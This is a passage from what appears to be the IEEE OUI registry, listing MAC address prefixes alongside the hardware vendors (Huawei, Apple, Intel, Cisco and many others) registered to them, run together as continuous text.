ARRIS Group, Inc. 000DB4 Stormshield 2CF05D Micro-Star INTL CO., LTD. 943BB0 New H3C Technologies Co., Ltd 9043E2 Cornami, Inc 803049 Liteon Technology Corporation E84943 YUGE Information technology Co. Ltd 501408 AiNET 289AF7 ADVA Optical Networking Ltd. 2811EC HUAWEI TECHNOLOGIES CO.,LTD B0B194 zte corporation E42686 DWnet Technologies(Suzhou) Corporation 38EB47 HUAWEI TECHNOLOGIES CO.,LTD 10C3AB HUAWEI TECHNOLOGIES CO.,LTD 00692D Sunnovo International Limited 0C3796 BIZLINK TECHNOLOGY, INC. F4032A Amazon Technologies Inc. 147740 Huawei Device Co., Ltd. B4157E Celona Inc. 18D98F Huawei Device Co., Ltd. 645E2C IRay Technology Co., Ltd. 703811 Siemens Mobility Limited 00E0EC CELESTICA INC. B89047 Apple, Inc. 646266 IEEE Registration Authority 487AF6 NCS ELECTRICAL SDN BHD 486E70 Zhejiang Tmall Technology Co., Ltd. 601D9D Sichuan AI-Link Technology Co., Ltd. 20826A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D85F77 Telink Semiconductor (Shanghai) Co., Ltd. 2C97ED Sony Imaging Products & Solutions Inc. 909C4A Apple, Inc. 908C43 Apple, Inc. 188A6A AVPro Global Hldgs 3C7D0A Apple, Inc. F01090 New H3C Technologies Co., Ltd 2050E7 AMPAK Technology,Inc. 3822E2 HP Inc. 701F3C Samsung Electronics Co.,Ltd D48A39 Samsung Electronics Co.,Ltd E4F3C4 Samsung Electronics Co.,Ltd 9C2F4E zte corporation D8A8C8 zte corporation 08BFA0 Samsung Electronics Co.,Ltd 5C5578 iryx corp B8C6AA Earda Technologies co Ltd 54AED0 DASAN Networks, Inc. 08C0EB Mellanox Technologies, Inc. E4E112 Texas Instruments 3414B5 Texas Instruments D003EB Texas Instruments 94DB56 Sony Home Entertainment&Sound Products Inc 889E68 Technicolor CH USA Inc. 6409AC TCT mobile ltd 743AEF Kaonmedia CO., LTD. 189E2C Huawei Device Co., Ltd. 40DEAD Juniper Networks 6CF712 Nokia 68B9D3 Shenzhen Trolink Technology CO, LTD 4CC53E Zyxel Communications Corporation 9056FC TECNO MOBILE LIMITED 1070FD Mellanox Technologies, Inc. 98ED5C Tesla,Inc. C44268 CRESTRON ELECTRONICS, INC. B86392 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 78AA82 New H3C Technologies Co., Ltd 5471DD Huawei Device Co., Ltd. 40F520 Espressif Inc. 38F601 Solid State Storage Technology Corporation 605464 Eyedro Green Solutions Inc. 206C8A Extreme Networks, Inc. 348584 Extreme Networks, Inc. 4018B1 Extreme Networks, Inc. E4A749 Palo Alto Networks 84D6C5 SolarEdge Technologies 885BDD Extreme Networks, Inc. D89136 Dover Fueling Solutions C88314 Tempo Communications FC956A OCTAGON SYSTEMS CORP. B8E3EE Universal Electronics, Inc. 24C8D3 McWane India Pvt Ltd 884033 HUAWEI TECHNOLOGIES CO.,LTD AC7A56 Cisco Systems, Inc C0A66D Inspur Group Co., Ltd. 70F096 Cisco Systems, Inc 40B31E Universal Electronics, Inc. E0F6B5 Nintendo Co.,Ltd 448DBF Rhino Mobility LLC 00051E Brocade Communications Systems LLC 948AC6 Realme Chongqing Mobile Telecommunications Corp.,Ltd. E0D462 Huawei Device Co., Ltd. 909838 Huawei Device Co., Ltd. 0012F2 Brocade Communications Systems LLC C4F57C Brocade Communications Systems LLC 0020A6 Proxim Wireless 5850ED Hangzhou Hikvision Digital Technology Co.,Ltd. 988B0A Hangzhou Hikvision Digital Technology Co.,Ltd. BCBAC2 Hangzhou Hikvision Digital Technology Co.,Ltd. ACCB51 Hangzhou Hikvision Digital Technology Co.,Ltd. 2C9FFB Wistron Neweb Corporation 84CCA8 Espressif Inc. 0C14D2 China Mobile Group Device Co.,Ltd. 708CBB MIMODISPLAYKOREA 987ECA Inventus Power Eletronica do Brasil LTDA F0B022 TOHO Electronics INC. 50382F ASE Group Chung-Li 6C2F8A Samsung Electronics Co.,Ltd B848AA EM Microelectronic D834EE Stem Audio D4F829 Sagemcom Broadband SAS 244BFE ASUSTek COMPUTER INC. 28B371 Ruckus Wireless E06234 Texas Instruments F8572E Core Brands, LLC 001C91 Gefen LLC 08ACC4 FMTech DC503A Nanjing Ticom Tech Co., Ltd. 18473D CHONGQING FUGUI ELECTRONICS CO.,LTD. F82F65 Huawei Device Co., Ltd. 0831A4 Huawei Device Co., Ltd. C014FE Cisco Systems, Inc 7CAD4F Cisco Systems, Inc A8E978 Huawei Device Co., Ltd. 7CDDE9 ATOM tech Inc. F86BD9 Cisco Systems, Inc 44F4E7 Cohesity Inc D477B2 Netix Global B.V. 70B5E8 Dell Inc. 942533 HUAWEI TECHNOLOGIES CO.,LTD 605661 IXECLOUD Tech 0C599C Juniper Networks 706979 IEEE Registration Authority FC609B New H3C Technologies Co., Ltd E8A1F8 zte corporation 98A942 Guangzhou Tozed Kangwei Intelligent Technology Co., LTD 108B6A Antailiye Technology Co.,Ltd 304240 zte corporation 4C2113 Nokia Shanghai Bell Co., Ltd. 802DBF Cisco Systems, Inc 60F677 Intel Corporate A08869 Intel Corporate 74E5F9 Intel Corporate 80000B Intel Corporate 24F150 Guangzhou Qi'an Technology Co., Ltd. 14C88B Apple, Inc. EC2651 Apple, Inc. 183EEF Apple, Inc. 40882F Extreme Networks, Inc. E43D1A Broadcom Limited 607EC9 Apple, Inc. 08FA79 vivo Mobile Communication Co., Ltd. 8C5EBD Huawei Device Co., Ltd. 3CF011 Intel Corporate 644C36 Intel Corporate 4889E7 Intel Corporate 24EE9A Intel Corporate 5C879C Intel Corporate 50EB71 Intel Corporate 0CDD24 Intel Corporate 34415D Intel Corporate 94B86D Intel Corporate 2016B9 Intel Corporate 38BAF8 Intel Corporate 3C6AA7 Intel Corporate 34E12D Intel Corporate 00BB60 Intel Corporate 1012FB Hangzhou Hikvision Digital Technology Co.,Ltd. FC7774 Intel Corporate 982CBC Intel Corporate 287FCF Intel Corporate 803253 Intel Corporate D8C0A6 AzureWave Technology Inc. 9CFCE8 Intel Corporate F8AC65 Intel Corporate CCD083 Aruba, a Hewlett Packard Enterprise Company C01C30 Shenzhen WIFI-3L Technology Co.,Ltd D8C678 MitraStar Technology Corp. B8CB29 Dell Inc. 44BB3B Google, Inc. 14C14E Google, Inc. 2CA042 Huawei Device Co., Ltd. C083C9 Huawei Device Co., Ltd. 9844CE HUAWEI TECHNOLOGIES CO.,LTD F09BB8 HUAWEI TECHNOLOGIES CO.,LTD ECC01B HUAWEI TECHNOLOGIES CO.,LTD BC17B8 Intel Corporate 441C7F Motorola Mobility LLC, a Lenovo Company 00B8B6 Motorola Mobility LLC, a Lenovo Company 8012DF Shenzhen SuperElectron Technology Co.,Ltd. C4A151 Sichuan Tianyi Comheart Telecom Co., Ltd. 1CE61D Samsung Electronics Co.,Ltd 10E77A STMicrolectronics International NV 90769F SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 80EA07 TP-LINK TECHNOLOGIES CO.,LTD. 04A2F3 Fiberhome Telecommunication Technologies Co.,LTD BC03A7 MFP MICHELIN 2C6F51 Herospeed Digital Technology Limited 982FF8 Huawei Device Co., Ltd. 40DCA5 Huawei Device Co., Ltd. CCDB93 Cisco Systems, Inc 18D61C Shenzhen TINNO Mobile Technology Corp. 5448E6 Beijing Xiaomi Mobile Software Co., Ltd 60D4E9 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 30C50F HUAWEI TECHNOLOGIES CO.,LTD 2868D2 HUAWEI TECHNOLOGIES CO.,LTD 90A935 JWEntertainment A486AE Quectel Wireless Solutions Co., Ltd. 1CD6BE Wistron Neweb Corporation 28D127 Beijing Xiaomi Mobile Software Co., Ltd C868DE Huawei Device Co., Ltd. D00DF7 Huawei Device Co., Ltd. 4805E2 Huawei Device Co., Ltd. 10341B Spacelink F81B04 Zhong Shan City Richsound Electronic Industrial Ltd D88C79 Google, Inc. 30A452 Arrival Elements BV 000BA2 Sumitomo Electric Industries, Ltd 0008F6 Sumitomo Electric Industries, Ltd 001E68 Quanta Computer Inc. 00238B Quanta Computer Inc. 8CC5B4 Sagemcom Broadband SAS 18ECE7 BUFFALO.INC F469D5 IEEE Registration Authority 2C600C Quanta Computer Inc. 00005F Sumitomo Electric Industries, Ltd 083AF2 Espressif Inc. 743A20 New H3C Technologies Co., Ltd 30C9AB CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 3C1A9E VitalThings AS C4D738 Huawei Device Co., Ltd. C884A1 Cisco Systems, Inc D8778B Intelbras 0003E8 Wavesight Limited 6CBAB8 Sagemcom Broadband SAS E0D464 Intel Corporate C0F6C2 HUAWEI TECHNOLOGIES CO.,LTD D4AFF7 Arista Networks 60077C Jala Group 609866 Texas Instruments 689320 New H3C Technologies Co., Ltd 9454CE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 388ABE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 047E23 China Mobile IOT Company Limited 5484DC zte corporation 38549B zte corporation DCCD2F Seiko Epson Corporation 14CCB3 AO GK NATEKS 8C8D28 Intel Corporate 343EA4 Ring LLC 04C1D8 Huawei Device Co., Ltd. C8BC9C Huawei Device Co., Ltd. B0FEE5 Huawei Device Co., Ltd. 084296 Mobile Technology Solutions LLC C81739 ITEL MOBILE LIMITED 58D061 HUAWEI TECHNOLOGIES CO.,LTD 34EFB6 Edgecore Networks Corporation E874C7 Sentinhealth E4842B HANGZHOU SOFTEL OPTIC CO., LTD B8D309 Cox Communications, Inc 94026B Optictimes Co.,Ltd 90CCDF Intel Corporate D46A91 SnapAV 001C7B Castlenet Technology Inc. 085BD6 Intel Corporate D021F9 Ubiquiti Networks Inc. F8D027 Seiko Epson Corporation 5C666C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C4BF9 IEEE Registration Authority 1CEA0B Edgecore Networks Corporation 44EFBF China Dragon Technology Limited B81F5E Apption Labs Limited D81265 CHONGQING FUGUI ELECTRONICS CO.,LTD. 4CB44A NANOWAVE Technologies Inc. 048C9A Huawei Device Co., Ltd. EC3CBB Huawei Device Co., Ltd. 8C3A7E Universal Electronics, Inc. 70441C SHENZHEN KAIFA TECHNOLOGY CO.,LTD. B47C59 Jiangsu Hengxin Technology Co.,Ltd. 300D9E Ruijie Networks Co.,LTD ECFA5C Beijing Xiaomi Electronics Co., Ltd. F8B46A Hewlett Packard BCB0E7 HUAWEI TECHNOLOGIES CO.,LTD 5434EF HUAWEI TECHNOLOGIES CO.,LTD 88D5A8 ITEL MOBILE LIMITED 208593 IEEE Registration Authority ACE342 HUAWEI TECHNOLOGIES CO.,LTD 9017C8 HUAWEI TECHNOLOGIES CO.,LTD E4922A DBG HOLDINGS LIMITED 2C641F Vizio, Inc 207759 OPTICAL NETWORK VIDEO TECHNOLOGIES (SHENZHEN) CO., LTD. 54E7D5 Sun Cupid Technology (HK) LTD 189088 eero inc. 4C56DF Targus US LLC 241510 IEEE Registration Authority 6C4D51 Shenzhen Ceres Technology Co., Ltd. 889D98 Allied-telesisK.K. DCF8B9 zte corporation 18BF1C Jiangsu Huitong Group Co.,Ltd. ACDE48 Private 0050C7 Private 002067 Private 4801C5 OnePlus Technology (Shenzhen) Co., Ltd B4EE25 Shenzhen Belon Technology CO.,LTD C82B96 Espressif Inc. 98523D Sunitec Enterprise Co.,Ltd D015A6 Aruba, a Hewlett Packard Enterprise Company 000163 Cisco Systems, Inc 60634C D-Link International 205F3D Cambridge Communication Systems Ltd 04819B BSkyB Ltd E00084 HUAWEI TECHNOLOGIES CO.,LTD 2CA89C Creatz inc. 4CDC0D Coral Telecom Limited 004E01 Dell Inc. C4E1A1 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD ACC358 Continental Automotive Czech Republic s.r.o. 3CECEF Super Micro Computer, Inc. 1855E3 Apple, Inc. E450EB Apple, Inc. 886440 Apple, Inc. 6070C0 Apple, Inc. F0C371 Apple, Inc. 64FF0A Wistron Neweb Corporation F09919 Garmin International 0000DE CETIA F43E66 Bee Computing (HK) Limited DC396F AVM Audiovisuelles Marketing und Computersysteme GmbH B4C476 Wuhan Maritime Communication Research Institute 683489 LEA Professional B46C47 Panasonic Appliances Company 44422F TESTOP CO.,LTD. 549C27 Plasma Cloud Limited D04E50 Mobiwire Mobiles (NingBo) Co., LTD 94BF80 zte corporation 987A14 Microsoft Corporation C83DDC Xiaomi Communications Co Ltd 9C3A9A Shenzhen Sundray Technologies Company Limited B0B5E8 Ruroc LTD 04D590 Fortinet, Inc. 541589 MCS Logic Inc. 845733 Microsoft Corporation 002423 AzureWave Technologies (Shanghai) Inc. 8C593C IEEE Registration Authority 6029D5 DAVOLINK Inc. 509744 Integrated Device Technology (Malaysia) Sdn. Bhd. 58F39C Cisco Systems, Inc C4411E Belkin International Inc. 0077E4 Nokia 00AD63 Dedicated Micros Malta LTD E415F6 Texas Instruments AC4228 Parta Networks F41D6B HUAWEI TECHNOLOGIES CO.,LTD 7CEC9B Fuzhou Teraway Information Technology Co.,Ltd CC9070 Cisco Systems, Inc 2841C6 HUAWEI TECHNOLOGIES CO.,LTD 380118 ULVAC,Inc. 14ADCA China Mobile Iot Limited company 809133 AzureWave Technology Inc. B4F58E HUAWEI TECHNOLOGIES CO.,LTD C48FC1 DEEPTRACK S.L.U. F82387 Shenzhen Horn Audio Co.,Ltd. E828C1 Eltex Enterprise Ltd. 78D347 Ericsson AB A4A179 Nanjing dianyan electric power automation co. LTD 68DB67 Nantong Coship Electronics Co., Ltd. 1819D6 Samsung Electronics Co.,Ltd BC98DF Motorola Mobility LLC, a Lenovo Company 70FC8F FREEBOX SAS 501B32 Taicang T&W Electronics 980D67 Zyxel Communications Corporation 0002D8 BRECIS Communications Corporation B0A6F5 Xaptum, Inc. ACF5E6 Cisco Systems, Inc DCB082 Nokia F8C397 NZXT Corp. Ltd. 70DDA8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 4C6F9C GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 782C29 New H3C Technologies Co., Ltd BC9FE4 Aruba, a Hewlett Packard Enterprise Company 702E80 DIEHL Connectivity Solutions ACA46E SHENZHEN GONGJIN ELECTRONICS CO.,LT C8B422 ASKEY COMPUTER CORP 94EE9F HMD Global Oy DC2AA1 MedHab LLC E4F3E8 Shenzhen SuperElectron Technology Co.,Ltd. F4323D Sichuan tianyi kanghe communications co., LTD F8B797 NEC Platforms, Ltd. B0AAD2 Sichuan tianyi kanghe communications co., LTD 109397 ARRIS Group, Inc. 5075F1 ARRIS Group, Inc. C46516 Hewlett Packard E41E0A IEEE Registration Authority CCA12B TCL King Electrical Appliances (Huizhou) Co., Ltd AC00D0 zte corporation E8C417 Fiberhome Telecommunication Technologies Co.,LTD 001EA3 Nokia Danmark A/S 38F32E Skullcandy 981E19 Sagemcom Broadband SAS 84B866 Beijing XiaoLu technology co. LTD 18BC5A Zhejiang Tmall Technology Co., Ltd. C4C138 OWLink Technology Inc AC37C9 RAID Incorporated 205869 Ruckus Wireless CC37AB Edgecore Networks Corporation 1422DB eero inc. C86314 IEEE Registration Authority 243154 HUAWEI TECHNOLOGIES CO.,LTD 2C58E8 HUAWEI TECHNOLOGIES CO.,LTD 70CD91 TERACOM TELEMATICA S.A 2C1875 Skyworth Digital Technology(Shenzhen) Co.,Ltd D06EDE Sagemcom Broadband SAS 18399C Skorpios Technologies 94C2BD TECNOBIT 4883B4 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 84B8B8 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. D041C9 Fiberhome Telecommunication Technologies Co.,LTD E8018D Fiberhome Telecommunication Technologies Co.,LTD 10A3B8 Iskratel d.o.o. E8ECA3 Dongguan Liesheng Electronic Co.Ltd 08A6BC Amazon Technologies Inc. 701E68 Hanna Instruments, Inc. 1CB3E9Shenzhen Zhongke United Communication Technology 8C965F Shandong Zhongan Technology Co., Ltd. C0074A Brita GmbH E8B2FE HUMAX Co., Ltd. 80FD7A BLU Products Inc 0017FA Microsoft Corporation 941625 Apple, Inc. 543B30 duagon AG 40F21C DASAN Zhone Solutions B0BB8B WAVETEL TECHNOLOGY LIMITED 34A8EB Apple, Inc. 94BFC4 Ruckus Wireless A483E7 Apple, Inc. F4AFE7 Apple, Inc. AC88FD Apple, Inc. 503E7C LeiShen IntelligentSystem Co.Ltd 24586E zte corporation B4A305 XIAMEN YAXON NETWORK CO., LTD. 803E48 SHENZHEN GONGJIN ELECTRONICS CO.,LT 243F30 Oxygen Broadband s.a. 3C9180 Liteon Technology Corporation 20326C Samsung Electronics Co.,Ltd 6489F1 Samsung Electronics Co.,Ltd 2034FB Xiaomi Communications Co Ltd A89CED Xiaomi Communications Co Ltd 6CA604 ARRIS Group, Inc. 5CF9DD Dell Inc. D0EC35 Cisco Systems, Inc 10AE60 Private 0025DF Private BCCF4F Zyxel Communications Corporation C010B1 HMD Global Oy 90895F WEIFANG GOERTEK ELECTRONICS CO.,LTD 48D845 Shenzhen Mainuoke Electronics Co., Ltd 0CE041 iDruide B88FB4 JABIL CIRCUIT ITALIA S.R.L 0052C2 peiker acustic GmbH 8C53D2 China Mobile Group Device Co.,Ltd. D45383 Murata Manufacturing Co., Ltd. A04246 IT Telecom Co., Ltd. 0CF475 Zliide Technologies ApS 68FF7B TP-LINK TECHNOLOGIES CO.,LTD. 808F1D TP-LINK TECHNOLOGIES CO.,LTD. 00124E XAC AUTOMATION CORP. 88E034 Shinwa industries(China) ltd. 48BD0E Quanta Storage Inc. 000F69 SEW Eurodrive GmbH & Co. KG E458E7 Samsung Electronics Co.,Ltd 00104A The Parvus Corporation D058C0 Qingdao Haier Multimedia Limited. F8D478 Flextronics Tech.(Ind) Pvt Ltd 48C3B0 Pharos Co.Ltd DC58BC Thomas-Krenn.AG 001025 Grayhill, Inc 3821C7 Aruba, a Hewlett Packard Enterprise Company A45F9B Nexell 70EA1A Cisco Systems, Inc 808A8B vivo Mobile Communication Co., Ltd. 9844B6 INFRANOR SAS 38839A SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. DC6723 barox Kommunikation GmbH 44B462 Flextronics Tech.(Ind) Pvt Ltd 94B40F Aruba, a Hewlett Packard Enterprise Company 001A1E Aruba, a Hewlett Packard Enterprise Company 00246C Aruba, a Hewlett Packard Enterprise Company 201BC9 Juniper Networks C8F6C8 Fiberhome Telecommunication Technologies Co.,LTD 1C3B8F Selve GmbH & Co. KG E4E749 Hewlett Packard ECC57F Suzhou Pairlink Network Technology 38C2BA CCTV NEOTECH A0F9B7 Ademco Smart Homes Technology(Tianjin)Co.,Ltd. A83CCB ROSSMA 886FD4 Dell Inc. CC3FEA BAE Systems, Inc 4CF2BF Cambridge Industries(Group) Co.,Ltd. CC9EA2 Amazon Technologies Inc. AC4330 Versa Networks E85BB7 Ample Systems Inc. 94677E Belden India Private Limited AC5775 HMD Global Oy D43A2E SHENZHEN MTC CO LTD 50AD92 NX Technologies 30C3D9 ALPS ELECTRIC CO., LTD. 003217 Cisco Systems, Inc 001BFB ALPS ELECTRIC CO., LTD. 94E0D6 China Dragon Technology Limited B4A9FC Quanta Computer Inc. 6CA936 DisplayLink (UK) Ltd 708540 Skyworth Digital Technology(Shenzhen) Co.,Ltd 08F1EA Hewlett Packard Enterprise F00DF5 ACOMA Medical Industry Co,. Ltd. 6845F1 TOSHIBA CLIENT SOLUTIONS CO., LTD. 8CAEDB NAG LLC 78B213 DWnet Technologies(Suzhou) Corporation 58C232 NEC Corporation 381D14 Skydio Inc. 7CDB98 ASKEY COMPUTER CORP 380B3C Texas Instruments 9C8CD8 Hewlett Packard Enterprise A48CC0 JLG Industries, Inc. 3C286D Google, Inc. 00093A Molex CMS 04F9D9 Speaker Electronic(Jiashan) Co.,Ltd DC080F Apple, Inc. F8E94E Apple, Inc. EC2CE2 Apple, Inc. 40BC60 Apple, Inc. E83617 Apple, Inc. 9C648B Apple, Inc. 344262 Apple, Inc. 14D00D Apple, Inc. 88D211 Eko Devices, Inc. B8C227 PSTec 74F737 KCE 48A493 TAIYO YUDEN CO.,LTD E82C6D SmartRG, Inc. 48E695 Insigma Inc B479C8 Ruckus Wireless B40B78 Brusa Elektronik AG C03DD9 MitraStar Technology Corp. 2CAA8E Wyze Labs Inc 703A51 Xiaomi Communications Co Ltd DC48B2 Baraja Pty. Ltd. ACAE19 Roku, Inc 181E95 AuVerte 0C9541 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. ACF85C Private 3C3786 NETGEAR 48352E Shenzhen Wolck Network Product Co.,LTD 04E598 Xiaomi Communications Co Ltd 1012B4 SICHUAN TIANYI COMHEART TELECOM CO.,LTD B82CA0 Resideo 6CC7EC SAMSUNG ELECTRO-MECHANICS(THAILAND) B033A6 Juniper Networks D89685 GoPro 3C01EF Sony Mobile Communications Inc C0BDC8 Samsung Electronics Co.,Ltd 647BCE Samsung Electronics Co.,Ltd A887B3 Samsung Electronics Co.,Ltd 6C006B Samsung Electronics Co.,Ltd 001060 BILLIONTON SYSTEMS, INC. C4D489 JiangSu Joyque Information Industry Co.,Ltd B4F949 optilink networks pvt ltd E43C80 University of Oklahoma 3C2C30 Dell Inc. 706D15 Cisco Systems, Inc A4A1E4 Innotube, Inc. 94EAEA TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 1CFD08 IEEE Registration Authority B8599F Mellanox Technologies, Inc. 301389 Siemens AG, Automations & Drives, 046B25 SICHUAN TIANYI COMHEART TELECOM CO.,LTD 98D3E7 Netafim L F063F9 HUAWEI TECHNOLOGIES CO.,LTD 7CC385 HUAWEI TECHNOLOGIES CO.,LTD 900EB3 Shenzhen Amediatech Technology Co., Ltd. 549FAE iBASE Gaming Inc 1469A2 SICHUAN TIANYI COMHEART TELECOM CO.,LTD 548028 Hewlett Packard Enterprise 00AD24 D-Link International 54068B Ningbo Deli Kebei Technology Co.LTD 60CE92 The Refined Industry Company Limited 105BAD Mega Well Limited 74BFC0 CANON INC. C8D9D2 Hewlett Packard 24FCE5 Samsung Electronics Co.,Ltd 809621 Lenovo 78055F Shenzhen WYC Technology Co., Ltd. 00EABD Cisco Systems, Inc 48872D SHEN ZHEN DA XIA LONG QUE TECHNOLOGY CO.,LTD E81A58 TECHNOLOGIC SYSTEMS 20B001 Technicolor C0BFA7 Juniper Networks F05494 Honeywell Connected Building 5CC999 New H3C Technologies Co., Ltd B02A43 Google, Inc. C474F8 Hot Pepper, Inc. 142233 Fiberhome Telecommunication Technologies Co.,LTD 743400 MTG Co., Ltd. DC3757 Integrated Device Technology (Malaysia) Sdn. Bhd. 005099 3COM EUROPE LTD 04BC87 Shenzhen JustLink Technology Co., LTD 54C33E Ciena Corporation EC79F2 Startel BCB22B EM-Tech D4AB82 ARRIS Group, Inc. 704FB8 ARRIS Group, Inc. 0060EB FOURTHTRACK SYSTEMS 1862E4 Texas Instruments 6035C0 SFR C4985C Hui Zhou Gaoshengda Technology Co.,LTD 30A1FA HUAWEI TECHNOLOGIES CO.,LTD 242E90 PALIT MICROSYSTEMS, LTD 9CAA1B Microsoft Corporation A89A93 Sagemcom Broadband SAS 001AC5 Keysight Technologies, Inc. 00201E NETQUEST CORPORATION 64628A evon GmbH 0415D9 Viwone ECB313 SHENZHEN GONGJIN ELECTRONICS CO.,LT B08BCF Cisco Systems, Inc 00608C 3COM 00A024 3COM 0020AF 3COM 00104B 3COM A85AF3 Shanghai Siflower Communication Technology Co., Ltd 70FD46 Samsung Electronics Co.,Ltd 8C83E1 Samsung Electronics Co.,Ltd 889F6F Samsung Electronics Co.,Ltd 5C63C9 Intellithings Ltd. 0C96E6 Cloud Network Technology (Samoa) Limited 3C8994 BSkyB Ltd E00EE1 We Corporation Inc. 000C43 Ralink Technology, Corp. 8C9246 Oerlikon Textile Gmbh&Co.KG 000E94 Maas International BV 4898CA Sichuan AI-Link Technology Co., Ltd. 247E51 zte corporation E8B541 zte corporation 0C9D92 ASUSTek COMPUTER INC. 988ED4 ITEL MOBILE LIMITED E8A788 XIAMEN LEELEN TECHNOLOGY CO., LTD 582D34 Qingping Electronics (Suzhou) Co., Ltd 20DE88 IC Realtime LLC F4068D devolo AG 001A31 SCAN COIN AB 001B84 Scan Engineering Telecom 482CA0 Xiaomi Communications Co Ltd 3412F9 HUAWEI TECHNOLOGIES CO.,LTD BCE265 HUAWEI TECHNOLOGIES CO.,LTD 4CD1A1 HUAWEI TECHNOLOGIES CO.,LTD 88BFE4 HUAWEI TECHNOLOGIES CO.,LTD 4017E2 INTAI TECHNOLOGY CORP. 0CCB85 Motorola Mobility LLC, a Lenovo Company A4E615 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 741F79 YOUNGKOOK ELECTRONICS CO.,LTD A09351 Cisco Systems, Inc 98039B Mellanox Technologies, Inc. 208984 COMPAL INFORMATION (KUNSHAN) CO., LTD. B4CEFE James Czekaj F8CC6E DEPO Electronics Ltd F8369B Texas Instruments 88AE1D COMPAL INFORMATION (KUNSHAN) CO., LTD. B888E3 COMPAL INFORMATION (KUNSHAN) CO., LTD. 289EFC Sagemcom Broadband SAS 00C055 MODULAR COMPUTING TECHNOLOGIES E41FE9 Dunkermotoren GmbH C4518D Shenzhen YOUHUA Technology Co., Ltd 486834 Silicon Motion, Inc. 001133 Siemens AG Austria 000B23 Siemens Home & Office Comm. Devices 641331 Bosch Car Multimedia (Wuhu) Co. Ltd. 183A48 VostroNet 782F17 Xlab Co.,Ltd B0027E MULLER SERVICES 24FAF3 Shanghai Flexem Technology Co.,Ltd. 88D2BF German Autolabs 20163D Integrated Device Technology (Malaysia) Sdn. Bhd. E0735F NUCOM 0051ED LG Innotek 40DC9D HAJEN 340A98 HUAWEI TECHNOLOGIES CO.,LTD 646D6C HUAWEI TECHNOLOGIES CO.,LTD C4B8B4 HUAWEI TECHNOLOGIES CO.,LTD F0BCC9 PFU LIMITED 487583 Intellion AG 904C81 Hewlett Packard Enterprise 8C3579 QDIQO Sp. z o.o. 38C70A WiFiSong D8760A Escort, Inc. 5C2ED2 ABC(XiSheng) Electronics Co.,Ltd FCFBFB Cisco Systems, Inc 007E95 Cisco Systems, Inc 9C5A44 COMPAL INFORMATION (KUNSHAN) CO., LTD. 14CAA0 Hu&Co 08D46A LG Electronics (Mobile Communications) 683A1E Cisco Meraki 001017 Bosch Access Systems GmbH F4EE14 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 6C5940 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. D02516 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 1C60DE MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. D82477 Universal Electric Corporation 00907F WatchGuard Technologies, Inc. 4C5E0C Routerboard.com D4CA6D Routerboard.com 001472 China Broadband Wireless IP Standard group(ChinaBWIPS) 80B575 HUAWEI TECHNOLOGIES CO.,LTD A4BE2B HUAWEI TECHNOLOGIES CO.,LTD 68E7C2 Samsung Electronics Co.,Ltd 58B10F Samsung Electronics Co.,Ltd 4006A0 Texas Instruments F82DC0 ARRIS Group, Inc. 189C27 ARRIS Group, Inc. 3CF5CC New H3C Technologies Co., Ltd D08A91 Technicolor CH USA Inc. 2811A5 Bose Corporation D8F3DB Post CH AG DCB4AC FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. A492CB Nokia C0D2F3 Hui Zhou Gaoshengda Technology Co.,LTD B88303 Hewlett Packard Enterprise 203DBD LG Innotek A45385 WEIFANG GOERTEK ELECTRONICS CO.,LTD 00402F XLNT DESIGNS INC. 04ECBB Fiberhome Telecommunication Technologies Co.,LTD 64A2F9 OnePlus Technology (Shenzhen) Co., Ltd A87D12 HUAWEI TECHNOLOGIES CO.,LTD D42122 Sercomm Corporation. 00C002 Sercomm Corporation. BC9911 Zyxel Communications Corporation 280245 Konze System Technology Co.,Ltd. E48F65 Yelatma Instrument Making Enterprise, JSC 0000A8 Stratus Technologies 0004FC Stratus Technologies 3C24F0 IEEE Registration Authority 00BB3A Amazon Technologies Inc. 0CB34F Shenzhen Xiaoqi Intelligent Technology Co., Ltd. 3CF4F9 Moda-InnoChips 94193A Elvaco AB C08135 Ningbo Forfan technology Co., LTD 840D8E Espressif Inc. 002082 ONEAC CORPORATION B4C0F5 Shenzhen TINNO Mobile Technology Corp. 406231 GIFA FCB7F0 Idaho National Laboratory 2C28B7 Hangzhou Ruiying technology co., LTD 106530 Dell Inc. 046B1B SYSDINE Co., Ltd. B0A37E QING DAO HAIER TELECOM CO.,LTD. 3CEAF9 JUBIXCOLTD 58DB15 TECNO MOBILE LIMITED 5050CE Hangzhou Dianyixia Communication Technology Co. Ltd. FC6947 Texas Instruments E07DEA Texas Instruments DCDE4F Gionee Communication Equipment Co Ltd 4CD0CB HUAWEI TECHNOLOGIES CO.,LTD 505DAC HUAWEI TECHNOLOGIES CO.,LTD E8FAF7 Guangdong Uniteddata Holding Group Co., Ltd. 949D57 Panasonic do Brasil Limitada 88D37B FirmTek, LLC 1C666D Hon Hai Precision Ind. Co.,Ltd. 84F3EB Espressif Inc. 001B48 Shenzhen Lantech Electronics Co., Ltd. 00250C Senet Inc 0C8063 TP-LINK TECHNOLOGIES CO.,LTD. 007278 Cisco Systems, Inc 645AED Apple, Inc. C0B658 Apple, Inc. 48A91C Apple, Inc. 50BC96 Apple, Inc. FC2A9C Apple, Inc. 682C7B Cisco Systems, Inc 441E98 Ruckus Wireless A056F3 Apple, Inc. 549963 Apple, Inc. 90DD5D Apple, Inc. DC2919 AltoBeam (Xiamen) Technology Ltd, Co. 885FE8 IEEE Registration Authority 002FD9 